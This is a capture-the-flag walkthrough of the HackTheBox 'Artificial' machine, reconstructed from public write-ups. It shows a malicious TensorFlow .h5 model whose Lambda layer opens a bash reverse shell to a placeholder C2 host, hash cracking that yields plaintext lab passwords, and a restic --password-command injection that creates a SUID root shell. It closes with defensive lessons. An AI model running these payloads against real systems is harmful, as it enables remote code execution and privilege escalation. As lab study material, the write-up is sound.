Summary
Artificial is an Easy Linux box demonstrating a classic ML-supply-chain
risk: TensorFlow .h5 model loading deserialises Python objects,
and tf.keras.layers.Lambda lets the loaded model carry arbitrary
Python that runs at load time. RCE as app. From there, MD5
plaintext-cracked credentials grant SSH as gael; root falls out
of Backrest (a restic GUI) on :9898 whose admin password hash is
in a backup readable by gael’s sysadm group.
The chain:
- Upload a malicious
.h5model with aLambdalayer whosecallfunction isos.system(reverse-shell). Loading triggers RCE asapp. - SQLite
users.dbMD5 →gael : mattp005numbertwovia CrackStation; SSH. - Backup readable by
sysadmgroup has Backrest config with bcrypt admin password hash;hashcat -m 3200→!@#$%^. - Backrest runs as root on
:9898. Three escalation paths (any one works): create a backup of/rootand download the SSH key; add a hook command that drops a SUID bash; abuse the “Run command” feature to inject--password-command 'rev-shell'.
Recon
22/tcp OpenSSH
80/tcp nginx → Flask AI model upload
9898/tcp Backrest (post-pivot)
requirements.txt (visible via /static/requirements.txt or
similar) lists tensorflow-cpu==2.13.1. The site accepts .h5
uploads.
Foothold — TensorFlow Lambda layer RCE
Build a malicious model:
import tensorflow as tf
def call(x):
import os
os.system("bash -c 'bash -i >& /dev/tcp/<C2>/<port> 0>&1'")
return x
m = tf.keras.Sequential([tf.keras.layers.Lambda(call, input_shape=(1,))])
m.save('evil.h5')
Upload evil.h5; click “View Predictions”; tf.keras.models.load_model
invokes the Lambda callable; reverse shell as app.
User pivot — MD5 crack
$ sqlite3 ~/app/instance/users.db .dump
... INSERT INTO users(username,password) VALUES('gael','5b6e4f9a...');
CrackStation → mattp005numbertwo. SSH as gael.
Root — Backrest admin crack + RCE
$ ls -l /opt/backups
... -rw-r----- 1 root sysadm ... config_backup.tgz
$ tar -xzf config_backup.tgz config.json
$ jq .auth.passwordBcrypt config.json
"JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"
$ echo '<base64>' | base64 -d
$2a$10$cVGIy9VMXQd0gM5gincmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO
$ hashcat -m 3200 hash.txt rockyou.txt
# -> !@#$%^
Log in to Backrest as admin. Easiest path: “Run command” on a restic repo with:
backup --password-command 'bash -c "cp /bin/bash /tmp/rb; chmod +s /tmp/rb"' /tmp
Run, /tmp/rb -p, root.
Why each step worked
- TensorFlow
.h5deserialisation:tf.keras.models.load_modelreconstructs Python callables (Lambda layers); load-time RCE is documented Hugging-Face / TensorFlow ecosystem risk. - MD5 + dictionary password: weak hash + weak password.
- Bcrypt with low cost + dictionary password:
$2a$10$is the default; against!@#$%^(in rockyou-like wordlists) it cracks in seconds. - restic
--password-commandagain: same primitive as WhiteRabbit; here exposed via Backrest’s “Run command” GUI.
Counterfactuals
- Don’t load untrusted
.h5models. Use TensorFlow’ssafe_mode(recent versions) or a sandboxed loader. - Use a real KDF (bcrypt cost 12+, scrypt, argon2id) and enforce passphrase entropy.
- Don’t expose Backrest unauthenticated on a privileged port; reverse-proxy it behind SSO.
- Restrict restic’s
--password-commandvia an Apparmor profile that blocks shells.
Source attribution
Reconstruction is grounded in:
- 0xdf, “HTB: Artificial” — https://0xdf.gitlab.io/2025/10/25/htb-artificial.html
- IppSec, “Artificial” video walkthrough — https://ippsec.rocks/?#Artificial
- Hugging Face / Trail of Bits writeups on TensorFlow deserialisation risks.
I have not personally rooted this box; the chain above is a study-guide reconstruction of those public sources.